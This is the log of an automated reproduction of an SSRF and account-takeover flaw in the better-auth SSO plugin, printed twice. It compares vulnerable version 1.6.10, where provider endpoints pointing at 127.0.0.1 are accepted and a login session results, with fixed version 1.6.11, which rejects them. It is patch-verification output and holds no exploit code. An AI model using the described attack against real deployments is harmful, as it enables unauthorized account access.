[repro] === Better-Auth SSO SSRF Reproduction === [repro] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro [repro] Setting up vuln version 1.6.10 in /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro/vuln [repro] Installing better-auth@1.6.10 @better-auth/sso@1.6.10 vitest ... npm warn deprecated uuid@8.3.2: uuid@10 and below is no longer supported. For ESM codebases, update to uuid@latest. For CommonJS codebases, use uuid@11 (but be aware this version will likely be deprecated in 2028). added 93 packages, and audited 94 packages in 2s 31 packages are looking for funding run `npm fund` for details 4 vulnerabilities (1 moderate, 1 high, 2 critical) To address all issues, run: npm audit fix --force Run `npm audit` for details. [repro] Running vitest for vuln (expect pass=true) ... [repro] Vulnerable test PASSED register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", callback status: 302 location: /dashboard session: { attacker requests: [ "url": "/token", "url": "/userinfo", [repro] Setting up fixed version 1.6.11 in /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro/fixed [repro] Installing better-auth@1.6.11 @better-auth/sso@1.6.11 vitest ... npm warn deprecated uuid@8.3.2: uuid@10 and below is no longer supported. For ESM codebases, update to uuid@latest. For CommonJS codebases, use uuid@11 (but be aware this version will likely be deprecated in 2028). added 93 packages, and audited 94 packages in 2s 31 packages are looking for funding run `npm fund` for details 4 vulnerabilities (1 moderate, 3 high) To address all issues, run: npm audit fix --force Run `npm audit` for details. [repro] Running vitest for fixed (expect pass=false) ... [repro] Fixed test failed as expected (patch working) - see /data/pruva/runs/40138a98-c019-4e3f-af73-3817c6446b3f/bundle/logs/fixed-test.log register response: 400 { 159| console.log("register response:", register.res.status, JSON.string… [repro] === Reproduction complete: vulnerable SSRF + account takeover confirmed, fixed version blocked === [repro] === Better-Auth SSO SSRF Reproduction === [repro] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro [repro] Setting up vuln version 1.6.10 in /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro/vuln [repro] Running vitest for vuln (expect pass=true) ... [repro] Vulnerable test PASSED register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", callback status: 302 location: /dashboard session: { attacker requests: [ "url": "/token", "url": "/userinfo", [repro] Setting up fixed version 1.6.11 in /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/repro/fixed [repro] Running vitest for fixed (expect pass=false) ... [repro] Fixed test failed as expected (patch working) - see /data/pruva/runs/40138a98-c019-4e3f-af73-3817c6446b3f/bundle/logs/fixed-test.log register response: 400 { 159| console.log("register response:", register.res.status, JSON.string… [repro] === Reproduction complete: vulnerable SSRF + account takeover confirmed, fixed version blocked ===